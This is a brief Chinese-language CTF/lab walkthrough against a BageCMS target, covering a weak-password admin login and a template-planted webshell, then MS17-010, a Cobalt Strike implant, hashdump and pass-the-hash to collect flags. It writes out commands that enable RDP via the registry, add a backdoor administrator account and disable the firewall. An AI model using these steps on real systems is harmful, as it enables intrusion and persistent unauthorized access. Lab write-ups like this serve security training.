BageCMS
fscan扫描到9652端口运行着CMS,版本大概率是3.1
进入/index.php?r=admini,通过弱密码:admin/admin123456进入到后台,编辑模板添加一句话木马
连接蚁剑,在根目录拿到flag1
开启RDP,添加后门用户
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
可以看到还存在192.168.20.10的段
MS17-010
搭建代理后进行内网扫描,发现存在MS17-010
直接读取flag3
PTH
添加完用户后走kali的xfreerdp上去关掉设置
然后才能在windows上通过代理连接(估计是我的电脑问题????)
上传一个cs的定向木马,然后进行hashdump
因为是域控,可以进行PTH
在根目录拿到flag2
